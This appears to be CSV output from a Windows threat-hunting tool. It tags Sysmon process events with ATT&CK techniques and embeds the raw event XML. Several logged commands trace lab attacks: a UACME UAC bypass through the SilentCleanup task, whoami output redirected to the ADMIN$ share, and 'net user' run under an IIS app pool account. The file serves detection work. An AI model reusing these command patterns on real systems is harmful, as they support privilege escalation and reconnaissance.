[T1053] Scheduled Task - Process,1564825609.40255,2019-08-03T13:46:49.402550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( &quot;C:\Windows\System32\schtasks.exe&quot; /run /tn &quot;\Microsoft\Windows\DiskCleanup\SilentCleanup&quot; /i ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T09:46:48.924858Z"">
</TimeCreated>
<EventRecordID>5133</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Persistence - Scheduled Task Management</Data>
<Data Name=""UtcTime"">2019-08-03 09:46:48.842</Data>
<Data Name=""ProcessGuid"">747F3D96-5808-5D45-0000-0010D1FE3E00</Data>
<Data Name=""ProcessId"">1268</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Task Scheduler Configuration Tool</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\schtasks.exe&quot; /run /tn &quot;\Microsoft\Windows\DiskCleanup\SilentCleanup&quot; /i</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020FBD31800</Data>
<Data Name=""LogonId"">0x18d3fb</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69</Data>
<Data Name=""ParentProcessGuid"">747F3D96-5808-5D45-0000-00106CDC3E00</Data>
<Data Name=""ParentProcessId"">924</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Desktop\UACME.exe</Data>
<Data Name=""ParentCommandLine"">UACME.exe 34</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656513.543589,2019-05-01T00:35:13.543589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:35:13.512339Z"">
</TimeCreated>
<EventRecordID>9839</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:35:13.512</Data>
<Data Name=""ProcessGuid"">365ABB72-B181-5CC8-0000-001023C41E00</Data>
<Data Name=""ProcessId"">1256</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B17F-5CC8-0000-0020C6A31E00</Data>
<Data Name=""LogonId"">0x1ea3c6</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B17F-5CC8-0000-001082A51E00</Data>
<Data Name=""ParentProcessId"">3572</Data>
<Data Name=""ParentImage"">C:\Windows\System32\mmc.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\mmc.exe -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Process - Created,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net user ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-24T01:33:53.182587Z"">
</TimeCreated>
<EventRecordID>1046</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-24 01:33:53.152</Data>
<Data Name=""ProcessGuid"">365ABB72-4A01-5CE7-0000-00102DA1AC00</Data>
<Data Name=""ProcessId"">788</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">net user</Data>
<Data Name=""CurrentDirectory"">c:\windows\system32\inetsrv\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-45C7-5CE7-0000-002092F99C00</Data>
<Data Name=""LogonId"">0x9cf992</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7</Data>
<Data Name=""ParentProcessGuid"">365ABB72-4A01-5CE7-0000-0010EE9DAC00</Data>
<Data Name=""ParentProcessId"">2404</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;c:\windows\system32\cmd.exe&quot; /c net user</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1556656372.402964,2019-05-01T00:32:52.402964+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /all ) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.371714Z"">
</TimeCreated>
<EventRecordID>9829</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.356</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010373E1D00</Data>
<Data Name=""ProcessId"">3328</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">whoami /all </Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0F3-5CC8-0000-0010C43A1D00</Data>
<Data Name=""ParentProcessId"">2828</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Network,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net user ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-24T01:33:53.182587Z"">
</TimeCreated>
<EventRecordID>1046</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-24 01:33:53.152</Data>
<Data Name=""ProcessGuid"">365ABB72-4A01-5CE7-0000-00102DA1AC00</Data>
<Data Name=""ProcessId"">788</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">net user</Data>
<Data Name=""CurrentDirectory"">c:\windows\system32\inetsrv\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-45C7-5CE7-0000-002092F99C00</Data>
<Data Name=""LogonId"">0x9cf992</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7</Data>
<Data Name=""ParentProcessGuid"">365ABB72-4A01-5CE7-0000-0010EE9DAC00</Data>
<Data Name=""ParentProcessId"">2404</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;c:\windows\system32\cmd.exe&quot; /c net user</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1607121664.542909,2020-12-05T02:41:04.542909+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-12-04T22:41:04.470207Z"">
</TimeCreated>
<EventRecordID>549016</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3560"" ThreadID=""4600"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-12-04 22:41:04.465</Data>
<Data Name=""ProcessGuid"">747F3D96-BB00-5FCA-0000-001033CD7600</Data>
<Data Name=""ProcessId"">8536</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">svchost.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\LOCAL SERVICE</Data>
<Data Name=""LogonGuid"">747F3D96-3407-5FCB-0000-0020E5030000</Data>
<Data Name=""LogonId"">0x3e5</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">612</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1579034803.8364,2020-01-15T00:46:43.836400+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;cmd.exe&quot; /c notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:46:43.819347Z"">
</TimeCreated>
<EventRecordID>341</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:46:43.675</Data>
<Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-001032047C00</Data>
<Data Name=""ProcessId"">1656</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;cmd.exe&quot; /c notepad.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
<Data Name=""LogonId"">0x7beb57</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
<Data Name=""ParentProcessId"">3412</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell) in event with Command Line (&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell) in directory : ( C:\Users\IEUser\Desktop\invoke-pipeshell-master\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-29T20:59:21.539311Z"">
</TimeCreated>
<EventRecordID>8048</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1896"" ThreadID=""1820"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-29 20:59:21.539</Data>
<Data Name=""ProcessGuid"">365ABB72-65A9-5CC7-0000-00104E5C2400</Data>
<Data Name=""ProcessId"">3376</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\invoke-pipeshell-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-5B3A-5CC7-0000-002096080100</Data>
<Data Name=""LogonId"">0x10896</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6231-5CC7-0000-00104CF71800</Data>
<Data Name=""ParentProcessId"">3940</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1618950794.860901,2021-04-21T00:33:14.860901+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-04-20T20:33:14.273416Z"">
</TimeCreated>
<EventRecordID>578505</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3392"" ThreadID=""4112"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-04-20 20:33:14.246</Data>
<Data Name=""ProcessGuid"">747F3D96-3A8A-607F-0000-0010E4717700</Data>
<Data Name=""ProcessId"">5280</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">svchost.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\LOCAL SERVICE</Data>
<Data Name=""LogonGuid"">747F3D96-82AF-607F-0000-0020E5030000</Data>
<Data Name=""LogonId"">0x3e5</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">612</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237538.260138,2020-08-12T17:05:38.260138+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:05:20.378005Z"">
</TimeCreated>
<EventRecordID>342407</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:05:16.721</Data>
<Data Name=""ProcessGuid"">747F3D96-E90C-5F33-0000-0010CB420200</Data>
<Data Name=""ProcessId"">3320</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-E909-5F33-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E909-5F33-0000-00108C580000</Data>
<Data Name=""ParentProcessId"">612</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-29T20:59:21.539311Z"">
</TimeCreated>
<EventRecordID>8048</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1896"" ThreadID=""1820"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-29 20:59:21.539</Data>
<Data Name=""ProcessGuid"">365ABB72-65A9-5CC7-0000-00104E5C2400</Data>
<Data Name=""ProcessId"">3376</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\invoke-pipeshell-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-5B3A-5CC7-0000-002096080100</Data>
<Data Name=""LogonId"">0x10896</Data>
